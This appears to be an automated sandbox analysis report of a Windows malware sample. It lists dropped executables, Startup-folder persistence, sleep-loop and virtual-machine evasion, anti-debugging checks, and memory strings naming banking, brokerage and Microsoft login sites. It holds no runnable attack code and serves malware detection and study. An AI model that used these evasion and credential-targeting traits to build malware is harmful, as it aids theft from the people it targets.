Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Dropped PE file which has not been started: C:\Windows\Temp\_MEI65122\python38.dll Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Dropped PE file which has not been started: C:\Windows\Temp\_MEI65122\_socket.pyd Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\1.exe Jump to dropped file
Source: C:\Users\mig.exe Dropped PE file which has not been started: C:\ProgramData\1.exe Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Dropped PE file which has not been started: C:\Windows\Temp\_MEI65122\unicodedata.pyd Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Dropped PE file which has not been started: C:\Windows\Temp\_MEI65122\_ssl.pyd Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Dropped PE file which has not been started: C:\Windows\Temp\_MEI65122\_lzma.pyd Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Dropped PE file which has not been started: C:\Windows\Temp\_MEI65122\_hashlib.pyd Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Dropped PE file which has not been started: C:\Windows\Temp\_MEI65122\select.pyd Jump to dropped file
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Found evasive API chain checking for process token information
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe API coverage: 4.6 %
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe API coverage: 2.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 2716 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4400 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3936 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6828 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2616 Thread sleep count: 8564 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2616 Thread sleep count: 1173 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1380 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7160 Thread sleep count: 6441 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2324 Thread sleep count: 3307 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2352 Thread sleep time: -2767011611056431s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\123.exe Code function: 3_2_00EBA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 3_2_00EBA69B
Source: C:\Users\123.exe Code function: 3_2_00ECC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 3_2_00ECC220
Source: C:\Users\123.exe Code function: 3_2_00EDB348 FindFirstFileExA, 3_2_00EDB348
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B3276F0 FindFirstFileExW,FindClose, 14_2_00007FF77B3276F0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B326B80 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 14_2_00007FF77B326B80
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B341674 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 14_2_00007FF77B341674
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B3276F0 FindFirstFileExW,FindClose, 16_2_00007FF77B3276F0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B326B80 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 16_2_00007FF77B326B80
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B341674 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 16_2_00007FF77B341674
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C4462 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte, 16_2_00007FF8A87C4462
Source: C:\Users\123.exe Code function: 3_2_00ECE6A3 VirtualQuery,GetSystemInfo, 3_2_00ECE6A3
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: file.exe, 00000000.00000002.3296547554.0000000008A1A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: svchosl.exe, 00000010.00000002.3275747889.00000213058A8000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000003.2377835190.0000021305890000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW of %SystemRoot%\system32\mswsock.dlldescriptor [*]
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.3288104311.0000000006E1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000003.2259743734.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000002.3280784216.0000000004A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\123.exe API call chain: ExitProcess graph end node
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Potentially malicious time measurement code found
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C63AC 16_2_00007FF8A87C63AC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C64EC 16_2_00007FF8A87C64EC
Contains functionality for execution timing, often used to detect debuggers
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C324C rdtsc 16_2_00007FF8A87C324C
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_044A0890 LdrInitializeThunk, 0_2_044A0890
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0040CE09
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 0_2_004019F0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 0_2_004019F0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029E092B mov eax, dword ptr fs:[00000030h] 0_2_029E092B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029E0D90 mov eax, dword ptr fs:[00000030h] 0_2_029E0D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02AA1D2B push dword ptr fs:[00000030h] 0_2_02AA1D2B
Source: C:\Users\123.exe Code function: 3_2_00ED7DEE mov eax, dword ptr fs:[00000030h] 3_2_00ED7DEE
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040ADB0 GetProcessHeap,HeapFree, 0_2_0040ADB0
Enables debug privileges
Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0040CE09
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0040E61C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00416F6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004123F1 SetUnhandledExceptionFilter, 0_2_004123F1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029EE883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_029EE883
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029ED070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_029ED070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029F71D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_029F71D1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029F2658 SetUnhandledExceptionFilter, 0_2_029F2658
Source: C:\Users\123.exe Code function: 3_2_00ECF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00ECF838
Source: C:\Users\123.exe Code function: 3_2_00ECF9D5 SetUnhandledExceptionFilter, 3_2_00ECF9D5
Source: C:\Users\123.exe Code function: 3_2_00ECFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00ECFBCA
Source: C:\Users\123.exe Code function: 3_2_00ED8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00ED8EBD
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_0000000140018800 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_0000000140018800
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_0000000140023D20 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_0000000140023D20
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_0000000140020180 SetUnhandledExceptionFilter, 6_2_0000000140020180
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_000000014001B6C4 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_000000014001B6C4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B32AD00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 14_2_00007FF77B32AD00
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B33A1D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_00007FF77B33A1D8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B32B740 SetUnhandledExceptionFilter, 14_2_00007FF77B32B740
